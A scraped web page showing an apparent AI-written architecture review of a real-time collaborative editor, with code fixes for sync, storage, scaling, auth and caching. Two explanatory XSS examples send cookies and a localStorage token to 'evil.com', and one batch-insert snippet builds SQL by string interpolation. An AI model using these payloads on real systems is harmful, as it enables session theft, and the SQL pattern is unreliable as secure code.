Server 3: 0 connections     (new, gets only NEW connections)

Round-robin sends new connections equally, but existing connections
don't rebalance. Server 3 is idle while 1 and 2 are overloaded.

The Solution: Least-connections routing + connection count awareness.

upstream api_servers {
    # Use least_conn instead of round-robin for WebSocket connections
    # This sends new connections to the server with fewest active connections
    least_conn;

    server api-1:3000;
    server api-2:3000;
    server api-3:3000;
}

# BUT: combine with consistent hashing for document routing (from 3.1)
# Use a two-tier approach:

# Tier 1: Document-to-server assignment (consistent hash)
# Tier 2: Within the assigned server, least-connections for load awareness

// Active rebalancing: when a new server joins, gradually migrate documents
async function rebalanceDocuments(newServerList) {
  const currentAssignments = await getDocumentAssignments();
  const newAssignments = consistentHash(currentAssignments, newServerList);

  for (const [docId, { oldServer, newServer }] of changedAssignments) {
    if (oldServer !== newServer) {
      // Gracefully migrate: tell clients to reconnect to new server
      await notifyClientsToReconnect(docId, newServer);
      // Stagger migrations to avoid thundering herd
      await sleep(100);
    }
  }
}

SUMMARY: PRIORITIZED FIX ORDER

┌────┬──────────────────────────────────────┬──────────┬────────────┐
│ #  │ Issue                                │ Severity │ Effort     │
├────┼──────────────────────────────────────┼──────────┼────────────┤
│ 1  │ Last-write-wins destroys data (1.2)  │ CRITICAL │ High       │
│ 2  │ JWT in localStorage / XSS (4.1)     │ CRITICAL │ Medium     │
│ 3  │ No document authorization (4.3)     │ CRITICAL │ Medium     │
│ 4  │ 30s snapshot data loss (2.1)        │ HIGH     │ Medium     │
│ 5  │ CDN caching API responses (5.1)     │ HIGH     │ Low        │
│ 6  │ 2-second cross-server delay (1.1)   │ HIGH     │ Low        │
│ 7  │ Client clock timestamps (1.3)       │ HIGH     │ Low        │
│ 8  │ No reconnection handling (6.1)      │ HIGH     │ Medium     │
│ 9  │ JWT no revocation (4.2)             │ MEDIUM   │ Medium     │
│ 10 │ Split-brain document routing (3.1)  │ MEDIUM   │ Medium     │
│ 11 │ HTML snapshot bloat/XSS (2.2)       │ MEDIUM   │ Medium     │
│ 12 │ Org-based hot spots (3.3)           │ MEDIUM   │ Low        │
│ 13 │ Read replica staleness (3.2)        │ MEDIUM   │ Medium     │
│ 14 │ PG write bottleneck (2.3)           │ LOW*     │ High       │
│ 15 │ WebSocket memory leaks (6.2)        │ LOW*     │ Medium     │
│ 16 │ Round-robin imbalance (7.1)         │ LOW*     │ Low        │
└────┴──────────────────────────────────────┴──────────┴────────────┘
  * LOW at current scale, becomes HIGH at scale

The core issue is that this architecture treats a real-time collaborative editor like a traditional CRUD application. The fundamental shift needed is from state-based synchronization (snapshots, last-write-wins) to operation-based synchronization (OT/CRDTs, operation logs, event sourcing). That single conceptual change resolves issues 1, 2, 3, 4, and 7 simultaneously.

Debug This Architecture

Turn this model response into notes, narration, or a short video

Auto Notes Transcript Narrate Video Cut

Partner link

This output is part of our open dataset — 5K+ AI responses across 200 models

About Claude Opus 4.6

Capabilities

ConversationReasoningCode GenerationAnalysisTool Use

Specifications

Provider: Anthropic
Released: 2026-02-04
Size: XLARGE
Context: 1,000,000 tokens

Keep exploring

SAME PROMPT

Claude Sonnet 4.6's version

Same prompt, different result

COMPARE

Claude Opus 4.6 vs Gemini 3.1 Pro Preview

Both outputs, side by side

Rival

Back to Claude Opus 4.6

Debug This Architecture

Claude Opus 4.6's response to the 'Debug This Architecture' challenge.

Claude Opus 4.6

February 4, 2026

Text

?
Prompt

Response

Claude Opus 4.6Debug This Architecture

Claude Opus 4.6

Comprehensive Architecture Review: Real-time Collaborative Document Editor

This architecture has several critical flaws that would cause data loss, inconsistency, and poor user experience at scale. I'll work through every layer systematically.

1. REAL-TIME SYNCHRONIZATION FAILURES

1.1 The Split-Brain WebSocket Problem

The Flaw: Each API server only broadcasts changes to its own WebSocket clients. Other servers discover changes by polling PostgreSQL every 2 seconds.

Timeline showing the problem:

Server A (Alice connected)          Server B (Bob connected)
─────────────────────────────────   ─────────────────────────────────
t=0.0s  Alice types "Hello"
t=0.0s  Broadcast to Server A
        clients ✓
t=0.0s  Write to PostgreSQL
                                    t=0.1s  Bob types "World"
                                    t=0.1s  Broadcast to Server B
                                            clients ✓
                                    t=0.1s  Write to PostgreSQL

        ... silence ...                     ... silence ...

t=2.0s                              t=2.0s  Poll PostgreSQL
        Poll PostgreSQL                     → discovers "Hello"
        → discovers "World"                 → broadcasts to Bob
        → broadcasts to Alice

Result: 2-SECOND LATENCY for cross-server collaboration.
        That's completely unacceptable for real-time editing.

The Solution: Dedicated pub/sub layer for inter-server communication.

┌──────────┐     WebSocket      ┌────────────┐
│  Alice    │◄──────────────────►│  Server A  │
└──────────┘                    └─────┬──────┘
                                      │ PUBLISH "doc:123"
                                      ▼
                                ┌────────────┐
                                │   Redis     │
                                │   Pub/Sub   │
                                └─────┬──────┘
                                      │ SUBSCRIBE "doc:123"
                                      ▼
┌──────────┐     WebSocket      ┌────────────┐
│   Bob     │◄──────────────────►│  Server B  │
└──────────┘                    └────────────┘

// Server-side: publish changes to all servers via Redis Pub/Sub
const Redis = require('ioredis');
const pub = new Redis(REDIS_URL);
const sub = new Redis(REDIS_URL);

// When a change arrives via WebSocket from a client
async function handleClientChange(change, documentId, serverId) {
  // 1. Persist to database
  await persistChange(change);

  // 2. Broadcast to local WebSocket clients (immediate, <10ms)
  broadcastToLocalClients(documentId, change);

  // 3. Publish to Redis so OTHER servers get it immediately
  await pub.publish(`doc:${documentId}`, JSON.stringify({
    change,
    originServer: serverId,  // so we can avoid echo
    timestamp: Date.now()
  }));
}

// Every server subscribes to channels for documents with active editors
sub.on('message', (channel, message) => {
  const { change, originServer } = JSON.parse(message);

  // Don't re-broadcast changes that originated from this server
  if (originServer === MY_SERVER_ID) return;

  const documentId = channel.replace('doc:', '');
  broadcastToLocalClients(documentId, change);
});

// Subscribe when a client opens a document
function onClientOpensDocument(documentId) {
  sub.subscribe(`doc:${documentId}`);
}

Trade-offs:

Added dependency: Redis becomes a critical path component (but you already have it)
Memory: Redis Pub/Sub doesn't buffer—if a server is temporarily disconnected, it misses messages (need a catch-up mechanism from the DB)
Latency improvement: Cross-server propagation drops from ~2000ms to ~5-15ms

1.2 Last-Write-Wins Destroys User Work

The Flaw: This is the most damaging design choice in the entire architecture. With last-write-wins at the paragraph level, concurrent edits cause silent data loss.

Scenario: Alice and Bob both edit the same paragraph simultaneously.

Original paragraph: "The quick brown fox"

Alice (t=100):  "The quick brown fox jumps over the lazy dog"
                 (added " jumps over the lazy dog")

Bob   (t=101):  "The slow brown fox"
                 (changed "quick" to "slow")

Last-write-wins result: "The slow brown fox"

Alice's addition is SILENTLY DELETED. No warning. No merge. Just gone.

The Solution: Operational Transformation (OT) or CRDTs.

For a Google Docs-style editor, OT is the proven approach. Here's the conceptual implementation:

// Each change is expressed as an operation, not a state snapshot
// Operations are: retain(n), insert(text), delete(n)

// Alice's operation on "The quick brown fox" (length 19):
const aliceOp = [
  retain(19),                          // keep everything
  insert(" jumps over the lazy dog")   // append
];

// Bob's operation on "The quick brown fox" (length 19):
const bobOp = [
  retain(4),           // keep "The "
  delete(5),           // remove "quick"
  insert("slow"),      // insert "slow"
  retain(10)           // keep " brown fox"
];

// The OT transform function computes compatible operations
const [alicePrime, bobPrime] = transform(aliceOp, bobOp);

// Applying both transformed operations yields:
// "The slow brown fox jumps over the lazy dog"
// BOTH edits are preserved!

// Server-side OT engine
class DocumentOTEngine {
  constructor(documentId) {
    this.documentId = documentId;
    this.revision = 0;         // monotonically increasing server revision
    this.operationLog = [];    // ordered list of all operations
  }

  /**
   * Client sends: { revision: clientRev, operation: op }
   * clientRev = the server revision the client's op was based on
   */
  async receiveOperation(clientRevision, operation, userId) {
    // Transform against all operations that happened since
    // the client's known revision
    let transformedOp = operation;

    for (let i = clientRevision; i < this.revision; i++) {
      const serverOp = this.operationLog[i];
      // Transform client op against each concurrent server op
      [transformedOp] = transform(transformedOp, serverOp);
    }

    // Apply the transformed operation to the server document
    this.document = apply(this.document, transformedOp);
    this.operationLog.push(transformedOp);
    this.revision++;

    // Persist and broadcast
    await this.persist(transformedOp);
    this.broadcast(transformedOp, userId);

    // Send acknowledgment to the original client
    return { revision: this.revision };
  }
}

Trade-offs:

Complexity: OT is notoriously hard to implement correctly (consider using a library like ot.js or ShareDB)
Server becomes a bottleneck: Operations for a single document must be serialized through one OT engine (see Section 3.1)
Alternative—CRDTs: Libraries like Yjs or Automerge allow peer-to-peer conflict resolution without a central server, but produce larger payloads and can have surprising merge semantics

1.3 Client Clock Timestamps Are Unreliable

The Flaw: Conflict resolution relies on client-side timestamps. Client clocks are arbitrary.

Alice's laptop clock: 2024-01-15 14:00:00 (correct)
Bob's laptop clock:   2024-01-15 09:00:00 (5 hours behind)

Bob's edits will ALWAYS lose to Alice's, even if Bob edited later.
Worse: a malicious user could set their clock to year 2030
and their edits would always win.

The Solution: Use server-assigned logical ordering.

// Every operation gets a server-side revision number
// This is the OT approach from 1.2, but even without OT:

class DocumentRevisionManager {
  // Use a PostgreSQL sequence or Redis INCR for atomic ordering
  async assignRevision(documentId, operation) {
    // INCR is atomic in Redis — no two operations get the same number
    const revision = await redis.incr(`doc:${documentId}:revision`);

    return {
      ...operation,
      revision,                        // server-assigned order
      serverTimestamp: Date.now(),     // server clock, not client
      // client timestamp kept only for analytics, never for ordering
      clientTimestamp: operation.clientTimestamp
    };
  }
}

Trade-offs:

Server-assigned ordering means the server is the single source of truth for operation order
Adds a few milliseconds of latency vs. pure client-side resolution
This is a necessary trade-off—there is no correct system that relies on unsynchronized client clocks

2. DATA STORAGE AND PERSISTENCE FAILURES

2.1 30-Second Snapshot Interval = 30 Seconds of Data Loss

The Flaw: Documents are saved as full HTML snapshots every 30 seconds. If a server crashes, up to 30 seconds of all active users' work is lost.

t=0s    Snapshot saved
t=5s    Alice types a paragraph
t=15s   Bob adds a table
t=25s   Carol writes three paragraphs
t=29s   SERVER CRASHES
        ─────────────────
        All work from t=0s to t=29s is GONE.
        Three users just lost their work simultaneously.

The Solution: Event-sourced operation log with periodic snapshots for fast loading.

// Every individual operation is persisted immediately
// Snapshots are just an optimization for fast document loading

// PostgreSQL schema
const schema = `
  -- The operation log is the source of truth
  CREATE TABLE document_operations (
    id            BIGSERIAL PRIMARY KEY,
    document_id   UUID NOT NULL,
    revision      INTEGER NOT NULL,
    operation     JSONB NOT NULL,          -- the OT operation
    user_id       UUID NOT NULL,
    created_at    TIMESTAMPTZ DEFAULT NOW(),
    UNIQUE(document_id, revision)          -- enforces operation ordering
  );

  -- Snapshots are a materialized optimization, not the source of truth
  CREATE TABLE document_snapshots (
    document_id   UUID NOT NULL,
    revision      INTEGER NOT NULL,        -- snapshot is valid AT this revision
    content       JSONB NOT NULL,          -- full document state
    created_at    TIMESTAMPTZ DEFAULT NOW(),
    PRIMARY KEY(document_id, revision)
  );

  -- Index for fast "give me ops since revision X" queries
  CREATE INDEX idx_ops_doc_revision
    ON document_operations(document_id, revision);
`;

// Loading a document: snapshot + replay
async function loadDocument(documentId) {
  // 1. Get the latest snapshot
  const snapshot = await db.query(`
    SELECT content, revision FROM document_snapshots
    WHERE document_id = $1
    ORDER BY revision DESC LIMIT 1
  `, [documentId]);

  // 2. Get all operations AFTER the snapshot
  const ops = await db.query(`
    SELECT operation FROM document_operations
    WHERE document_id = $1 AND revision > $2
    ORDER BY revision ASC
  `, [documentId, snapshot.revision]);

  // 3. Replay operations on top of snapshot
  let document = snapshot.content;
  for (const op of ops) {
    document = applyOperation(document, op.operation);
  }

  return { document, revision: snapshot.revision + ops.length };
}

// Background job: create snapshots periodically to bound replay cost
async function createSnapshot(documentId) {
  const { document, revision } = await loadDocument(documentId);
  await db.query(`
    INSERT INTO document_snapshots (document_id, revision, content)
    VALUES ($1, $2, $3)
    ON CONFLICT DO NOTHING
  `, [documentId, revision, document]);
}

Trade-offs:

More writes: Every keystroke (or batched group of keystrokes) hits the database instead of one write every 30 seconds
Mitigation: Batch operations client-side (e.g., send every 100ms or on pause), and use PostgreSQL's efficient append-only inserts
Storage growth: Operation logs grow indefinitely—need a compaction strategy (snapshot + truncate old ops)
Benefit: Zero data loss on server crash, plus you get full edit history/undo for free

2.2 Full HTML Snapshots Are Fragile and Bloated

The Flaw: Storing documents as "full HTML snapshots" creates multiple problems:

Problems with raw HTML storage:

1. XSS VULNERABILITY:
   User pastes: <img src=x onerror="fetch('evil.com/steal?cookie='+document.cookie)">
   If stored as raw HTML and rendered, every viewer gets compromised.

2. BLOAT:
   A 1-page document in HTML: ~50KB
   Same content in structured JSON: ~5KB
   With 30-second snapshots × millions of documents = massive storage

3. NO STRUCTURED OPERATIONS:
   You can't diff two HTML snapshots to figure out what changed.
   You can't do OT on raw HTML.
   You can't build features like "show me what Bob changed."

The Solution: Use a structured document model (like ProseMirror/Tiptap's JSON schema).

// Instead of: "<h1>Title</h1><p>Hello <strong>world</strong></p>"
// Store:
const documentStructure = {
  type: "doc",
  content: [
    {
      type: "heading",
      attrs: { level: 1 },
      content: [{ type: "text", text: "Title" }]
    },
    {
      type: "paragraph",
      content: [
        { type: "text", text: "Hello " },
        { type: "text", text: "world", marks: [{ type: "bold" }] }
      ]
    }
  ]
};

// This structured format:
// ✓ Can be validated against a schema (no XSS)
// ✓ Can be diffed structurally
// ✓ Can have OT operations applied to it
// ✓ Is ~60-80% smaller than equivalent HTML
// ✓ Can be rendered to HTML, Markdown, PDF, etc.

// Sanitization on output (defense in depth)
function renderToHTML(doc) {
  // Even with structured storage, sanitize on render
  return sanitizeHtml(structuredToHtml(doc), {
    allowedTags: ['h1','h2','h3','p','strong','em','a','ul','ol','li','table'],
    allowedAttributes: { 'a': ['href'] }
  });
}

2.3 PostgreSQL Write Bottleneck Under Real-Time Load

Back-of-napkin math:
- 100,000 concurrent users
- Average 3 operations/second per user (typing)
- = 300,000 writes/second to PostgreSQL
- Each write needs to be durable (fsync) for data safety
- PostgreSQL on good hardware: ~50,000-100,000 TPS

You're 3-6x over capacity.

The Solution: Multi-tier write strategy.

// Tier 1: Redis Streams for immediate durability + ordering (microseconds)
// Tier 2: Async drain from Redis to PostgreSQL (batched, milliseconds)

const Redis = require('ioredis');
const redis = new Redis(REDIS_URL);

// When an operation arrives, write to Redis Stream (very fast, persistent)
async function persistOperation(documentId, operation) {
  // XADD is O(1) and Redis Streams are persistent (AOF)
  const streamId = await redis.xadd(
    `ops:${documentId}`,
    '*',  // auto-generate ID
    'op', JSON.stringify(operation)
  );

  // Also publish for real-time broadcast (from section 1.1)
  await redis.publish(`doc:${documentId}`, JSON.stringify(operation));

  return streamId;
}

// Background worker: drain Redis Streams to PostgreSQL in batches
async function drainToPostgres() {
  while (true) {
    // Read up to 100 operations from each active document stream
    const streams = await redis.xreadgroup(
      'GROUP', 'pg-writer', 'worker-1',
      'COUNT', 100,
      'BLOCK', 1000,  // wait up to 1s for new data
      'STREAMS', ...activeDocumentStreams, ...ids
    );

    if (streams) {
      // Batch insert into PostgreSQL (much more efficient)
      const values = streams.flatMap(([stream, entries]) =>
        entries.map(([id, fields]) => {
          const op = JSON.parse(fields[1]);
          return `('${op.documentId}', ${op.revision}, '${JSON.stringify(op)}'::jsonb)`;
        })
      );

      await db.query(`
        INSERT INTO document_operations (document_id, revision, operation)
        VALUES ${values.join(',')}
      `);

      // Acknowledge processed entries
      for (const [stream, entries] of streams) {
        await redis.xack(stream, 'pg-writer', ...entries.map(e => e[0]));
      }
    }
  }
}

Trade-offs:

Added complexity: Two storage systems to manage
Failure mode: If Redis dies before draining to PostgreSQL, you lose those operations (mitigate with Redis AOF persistence + replication)
Consistency: PostgreSQL is now slightly behind real-time (acceptable since real-time reads come from Redis/memory anyway)

3. SCALING AND CONCURRENCY FAILURES

3.1 Document-Level Concurrency Bottleneck

Round-robin distributes users randomly:

Server 1: Alice (doc A), Dave (doc B), Grace (doc A)
Server 2: Bob (doc A), Eve (doc C), Heidi (doc A)
Server 3: Carol (doc A), Frank (doc B), Ivan (doc A)

Document A's operations arrive at 3 different servers.
Who serializes them? Who runs the OT engine?
Every server would need to coordinate via distributed locking. Nightmare.

The Solution: Sticky routing — all connections for a document go to the same server.

# Nginx/HAProxy: route by document ID, not round-robin
upstream api_servers {
    # Consistent hashing by document ID
    hash $arg_documentId consistent;

    server api-1:3000;
    server api-2:3000;
    server api-3:3000;
}

# WebSocket upgrade with document-based routing
map $args $document_id {
    ~documentId=(?<did>[^&]+) $did;
}

server {
    location /ws {
        proxy_pass http://api_servers;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";

        # Sticky routing: same document always goes to same server
        # Consistent hashing means adding/removing servers only
        # remaps ~1/N of documents
    }
}

// Server-side: each server is the authoritative OT engine
// for its assigned documents

class Server {
  constructor() {
    // In-memory OT engines only for documents assigned to THIS server
    this.documentEngines = new Map();
  }

  getOrCreateEngine(documentId) {
    if (!this.documentEngines.has(documentId)) {
      const engine = new DocumentOTEngine(documentId);
      // Load current state from database
      engine.initialize();
      this.documentEngines.set(documentId, engine);
    }
    return this.documentEngines.get(documentId);
  }

  async handleOperation(documentId, clientRevision, operation) {
    const engine = this.getOrCreateEngine(documentId);
    // Serialized per-document via the single engine instance
    // Node.js single-threaded event loop helps here!
    return engine.receiveOperation(clientRevision, operation);
  }
}

Trade-offs:

Hot documents: A viral document with 10,000 concurrent editors overwhelms one server (need document sharding at that scale—split into sections)
Server failure: When a server dies, its documents must be reassigned (consistent hashing makes this automatic, but clients need to reconnect)
Uneven load: Some servers may handle more active documents than others (monitor and rebalance)

3.2 Read Replica Lag Causes Stale Reads

t=0ms   User saves document title → write goes to PRIMARY
t=5ms   User's browser requests document list → read goes to REPLICA
        Replica hasn't received the write yet
        User doesn't see their new title → "Where did my change go?!"

The Solution: Read-your-own-writes consistency.

// Track the last write position per user session
class ConsistentReader {
  // After any write, store the PostgreSQL WAL position
  async afterWrite(userId) {
    const result = await primaryDb.query(
      'SELECT pg_current_wal_lsn() as lsn'
    );
    await redis.set(
      `user:${userId}:last_write_lsn`,
      result.rows[0].lsn,
      'EX', 30  // expire after 30 seconds
    );
  }

  // Before any read, check if the replica has caught up
  async getReadConnection(userId) {
    const lastWriteLsn = await redis.get(`user:${userId}:last_write_lsn`);

    if (!lastWriteLsn) {
      // No recent writes — replica is fine
      return replicaDb;
    }

    // Check if replica has caught up to the user's last write
    const result = await replicaDb.query(
      'SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn as caught_up',
      [lastWriteLsn]
    );

    if (result.rows[0].caught_up) {
      return replicaDb;
    }

    // Replica hasn't caught up — read from primary
    return primaryDb;
  }
}

Trade-offs:

More primary reads: Some reads that could go to replicas will hit the primary
Complexity: Need to track write positions per user
Alternative: For the real-time editing path, bypass replicas entirely (all real-time state comes from Redis/memory); use replicas only for non-real-time queries (analytics, search, document listing)

3.3 Organization-Based Partitioning Creates Hot Spots

Partition 1: ["TinyStartup LLC"]     → 200 documents
Partition 2: ["MegaCorp Inc."]       → 5,000,000 documents
Partition 3: ["SmallAgency Co."]     → 500 documents

Partition 2 is a massive hot spot.

The Solution: Hash-based partitioning on document ID, with organization as a secondary index.

-- Partition by hash of document_id (even distribution guaranteed)
CREATE TABLE document_operations (
    id            BIGSERIAL,
    document_id   UUID NOT NULL,
    org_id        UUID NOT NULL,
    revision      INTEGER NOT NULL,
    operation     JSONB NOT NULL,
    created_at    TIMESTAMPTZ DEFAULT NOW()
) PARTITION BY HASH (document_id);

-- Create partitions (e.g., 16 partitions)
CREATE TABLE document_operations_p0
    PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 0);
CREATE TABLE document_operations_p1
    PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 1);
-- ... through p15

-- Organization-level queries use an index, not the partition key
CREATE INDEX idx_ops_org ON document_operations (org_id, created_at);

Trade-offs:

Cross-org queries are fine: Hash partitioning distributes evenly
Org-level queries are slightly slower: Must scan all partitions (but the index helps)
Rebalancing: Adding partitions requires data redistribution (plan partition count for 5-year growth)

4. SECURITY VULNERABILITIES

4.1 JWT in localStorage = XSS Token Theft

The Flaw: JWTs stored in localStorage are accessible to any JavaScript running on the page. A single XSS vulnerability (including from third-party scripts) exposes every user's session.

// Any XSS payload can steal the token:
fetch('https://evil.com/steal', {
  method: 'POST',
  body: JSON.stringify({
    token: localStorage.getItem('auth_token'),
    // Attacker now has a 24-hour valid session
    // They can read/modify ALL of the user's documents
  })
});

The Solution: HttpOnly cookies with proper security attributes.

// Server: set JWT as HttpOnly cookie (JavaScript cannot access it)
function setAuthCookie(res, token) {
  res.cookie('session', token, {
    httpOnly: true,     // JavaScript cannot read this cookie
    secure: true,       // only sent over HTTPS
    sameSite: 'strict', // not sent on cross-origin requests (CSRF protection)
    maxAge: 24 * 60 * 60 * 1000,  // 24 hours
    path: '/',
    domain: '.yourdomain.com'
  });
}

// For WebSocket auth (cookies are sent on WS handshake):
const WebSocket = require('ws');
const wss = new WebSocket.Server({ noServer: true });

server.on('upgrade', (request, socket, head) => {
  // Parse cookie from the upgrade request headers
  const cookies = parseCookies(request.headers.cookie);
  const token = cookies.session;

  try {
    const user = jwt.verify(token, JWT_SECRET);
    wss.handleUpgrade(request, socket, head, (ws) => {
      ws.user = user;
      wss.emit('connection', ws, request);
    });
  } catch (err) {
    socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
    socket.destroy();
  }
});

Trade-offs:

CSRF risk: Cookies are sent automatically, so you need CSRF protection (SameSite=Strict handles most cases; add CSRF tokens for older browsers)
Cross-domain complexity: If your API is on a different domain than your frontend, you need CORS configuration
Mobile/native clients: May need a separate token-based auth flow (but web clients should use cookies)

4.2 24-Hour JWT with No Revocation

t=0h    Employee gets JWT (expires t=24h)
t=1h    Employee is terminated, account deactivated
t=1h-24h  Terminated employee still has full access
          Can download/modify/delete all documents they had access to

The Solution: Short-lived access tokens + refresh token rotation + server-side deny list.

// Token strategy:
// - Access token: 15-minute expiry (short-lived, used for API calls)
// - Refresh token: 7-day expiry (stored in HttpOnly cookie, used to get new access tokens)

function issueTokens(user) {
  const accessToken = jwt.sign(
    { userId: user.id, role: user.role },
    ACCESS_SECRET,
    { expiresIn: '15m' }
  );

  const refreshToken = jwt.sign(
    { userId: user.id, tokenFamily: uuid() },
    REFRESH_SECRET,
    { expiresIn: '7d' }
  );

  // Store refresh token hash in database for revocation
  await db.query(`
    INSERT INTO refresh_tokens (user_id, token_hash, family, expires_at)
    VALUES ($1, $2, $3, NOW() + INTERVAL '7 days')
  `, [user.id, hash(refreshToken), refreshToken.tokenFamily]);

  return { accessToken, refreshToken };
}

// Fast revocation check using Redis (checked on every request)
async function isTokenRevoked(jti) {
  return await redis.sismember('revoked_tokens', jti);
}

// When user is deactivated: revoke all their tokens
async function deactivateUser(userId) {
  // Add all active token IDs to the deny list
  await redis.sadd('revoked_tokens', ...activeTokenIds);
  // Delete all refresh tokens
  await db.query('DELETE FROM refresh_tokens WHERE user_id = $1', [userId]);
}

Trade-offs:

Added latency: Every request checks the deny list (Redis SISMEMBER is O(1), adds ~1ms)
Complexity: Refresh token rotation logic is non-trivial
Hybrid approach: You're adding server-side state to a "stateless" JWT system (but pure stateless JWTs are inappropriate for applications that need revocation)

4.3 No Document-Level Authorization on WebSocket Messages

The Flaw: The architecture describes authentication (JWT) but not authorization. Once authenticated, can any user open a WebSocket to any document? Every incoming operation must be checked.

// VULNERABLE: no authorization check
ws.on('message', async (data) => {
  const { documentId, operation } = JSON.parse(data);
  // Anyone can send operations to any document!
  await handleOperation(documentId, operation);
});

The Solution: Per-document permission checks on every operation.

// Permission model
const PERMISSIONS = {
  OWNER: ['read', 'write', 'share', 'delete'],
  EDITOR: ['read', 'write'],
  COMMENTER: ['read', 'comment'],
  VIEWER: ['read']
};

// Check on WebSocket connection AND on every message
ws.on('message', async (data) => {
  const { documentId, operation } = JSON.parse(data);

  // Check permission (cached in Redis for performance)
  const permission = await getPermission(ws.user.id, documentId);

  if (!permission || !PERMISSIONS[permission].includes('write')) {
    ws.send(JSON.stringify({
      error: 'FORBIDDEN',
      message: 'You do not have write access to this document'
    }));
    return;
  }

  await handleOperation(documentId, operation, ws.user);
});

// Cache permissions in Redis (invalidate on share/unshare)
async function getPermission(userId, documentId) {
  const cacheKey = `perm:${userId}:${documentId}`;
  let permission = await redis.get(cacheKey);

  if (!permission) {
    const result = await db.query(`
      SELECT role FROM document_permissions
      WHERE user_id = $1 AND document_id = $2
    `, [userId, documentId]);

    permission = result.rows[0]?.role || 'NONE';
    await redis.set(cacheKey, permission, 'EX', 300); // cache 5 min
  }

  return permission === 'NONE' ? null : permission;
}

5. CDN AND CACHING FAILURES

5.1 CDN Caching API Responses = Serving Stale/Wrong Data

The Flaw: CloudFront caching API responses for 5 minutes is extremely dangerous for a collaborative editor. Users will see stale document lists, stale permissions, and stale content.

Scenario:
t=0:00  Alice shares document with Bob → API returns "shared" status
        CloudFront caches this response

t=0:30  Alice REVOKES Bob's access → API returns "not shared"
        But CloudFront still has the old cached response

t=0:30-5:00  Bob's browser still gets the cached "shared" response
             Bob can still see and potentially access the document
             for up to 5 more minutes after access was revoked

The Solution: Separate caching strategies by content type.

// CDN configuration: NEVER cache authenticated API responses
// Only cache static assets and truly public content

// CloudFront behavior configurations:
const cloudFrontBehaviors = {
  // Static assets: aggressive caching
  '/static/*': {
    cachePolicyId: 'CachingOptimized',  // cache forever, bust with filename hash
    ttl: { default: 86400, max: 31536000 },
    compress: true
  },

  // Public marketing pages: moderate caching
  '/public/*': {
    cachePolicyId: 'CachingOptimized',
    ttl: { default: 300 },  // 5 min is fine for public content
  },

  // API endpoints: NO CDN CACHING
  '/api/*': {
    cachePolicyId: 'CachingDisabled',
    originRequestPolicyId: 'AllViewer',  // forward all headers
    // Let the application server set its own Cache-Control headers
  },

  // WebSocket: pass through entirely
  '/ws': {
    cachePolicyId: 'CachingDisabled',
    originRequestPolicyId: 'AllViewer',
  }
};

// Application-level caching headers (set by the API server)
app.get('/api/documents', (req, res) => {
  res.set({
    'Cache-Control': 'private, no-store',  // never cache user-specific data
    'Vary': 'Authorization, Cookie'
  });
  // ... return documents
});

app.get('/api/documents/:id/content', (req, res) => {
  // Document content changes constantly in a collaborative editor
  res.set('Cache-Control', 'no-store');
  // ... return content
});

Trade-offs:

Higher origin load: API requests always hit your servers (this is correct—authenticated, mutable data should not be CDN-cached)
Mitigation: Use application-level caching (Redis) instead of CDN caching for API responses
Static assets still benefit: JS bundles, CSS, images, fonts are still CDN-cached

6. CONNECTION MANAGEMENT FAILURES

6.1 No WebSocket Reconnection or Offline Handling

The Solution: Client-side operation buffering with automatic reconnection.

class ResilientDocumentConnection {
  constructor(documentId) {
    this.documentId = documentId;
    this.pendingOps = [];          // operations not yet acknowledged by server
    this.bufferedOps = [];         // operations created while disconnected
    this.serverRevision = 0;
    this.state = 'disconnected';   // disconnected | connecting | synchronized
    this.reconnectAttempt = 0;
  }

  connect() {
    this.state = 'connecting';
    this.ws = new WebSocket(
      `wss://api.example.com/ws?documentId=${this.documentId}`
    );

    this.ws.onopen = () => {
      this.state = 'synchronized';
      this.reconnectAttempt = 0;

      // Send any operations that were buffered while offline
      for (const op of this.bufferedOps) {
        this.sendOperation(op);
      }
      this.bufferedOps = [];
    };

    this.ws.onclose = (event) => {
      this.state = 'disconnected';
      this.scheduleReconnect();
    };

    this.ws.onerror = () => {
      // onclose will fire after onerror
    };

    this.ws.onmessage = (event) => {
      this.handleServerMessage(JSON.parse(event.data));
    };
  }

  // User makes an edit
  applyLocalOperation(operation) {
    // Always apply locally immediately (optimistic)
    this.editor.apply(operation);

    if (this.state === 'synchronized') {
      this.sendOperation(operation);
    } else {
      // Buffer for later — user can keep typing offline
      this.bufferedOps.push(operation);
      this.showOfflineIndicator();
    }
  }

  scheduleReconnect() {
    // Exponential backoff with jitter
    const baseDelay = Math.min(1000 * Math.pow(2, this.reconnectAttempt), 30000);
    const jitter = baseDelay * 0.5 * Math.random();
    const delay = baseDelay + jitter;

    this.reconnectAttempt++;

    console.log(`Reconnecting in ${Math.round(delay)}ms (attempt ${this.reconnectAttempt})`);
    setTimeout(() => this.connect(), delay);
  }

  showOfflineIndicator() {
    // Show yellow "offline — changes will sync when reconnected" banner
    // Users MUST know their changes aren't saved yet
    document.getElementById('sync-status').className = 'offline';
  }
}

Trade-offs:

Conflict resolution on reconnect: Buffered operations may conflict with changes made by others while offline (OT handles this, but the longer the offline period, the more complex the transform)
Memory: Very long offline sessions could buffer many operations (set a reasonable limit and warn the user)
UX: Must clearly communicate connection state to users

6.2 WebSocket Memory Leaks on Server

The Flaw: Long-lived WebSocket connections accumulate state. Without proper cleanup, servers leak memory from abandoned connections, dead subscriptions, and orphaned OT engine instances.

// Common leak patterns:

// LEAK 1: Client closes browser without clean disconnect
// The TCP connection may stay "open" on the server for minutes

// LEAK 2: OT engines for documents that no one is editing anymore
// stay in memory indefinitely

// LEAK 3: Redis pub/sub subscriptions for documents never unsubscribed

The Solution: Heartbeat monitoring + resource lifecycle management.

class ConnectionManager {
  constructor() {
    this.connections = new Map();  // ws → metadata
    this.documentSubscribers = new Map();  // documentId → Set<ws>
  }

  addConnection(ws, user, documentId) {
    ws.isAlive = true;
    ws.documentId = documentId;

    this.connections.set(ws, {
      user,
      documentId,
      connectedAt: Date.now(),
      lastActivity: Date.now()
    });

    // Track subscribers per document
    if (!this.documentSubscribers.has(documentId)) {
      this.documentSubscribers.set(documentId, new Set());
      redis.subscribe(`doc:${documentId}`);  // subscribe on first user
    }
    this.documentSubscribers.get(documentId).add(ws);

    // Heartbeat: client must respond to pings
    ws.on('pong', () => { ws.isAlive = true; });
    ws.on('close', () => this.removeConnection(ws));
    ws.on('error', () => this.removeConnection(ws));
  }

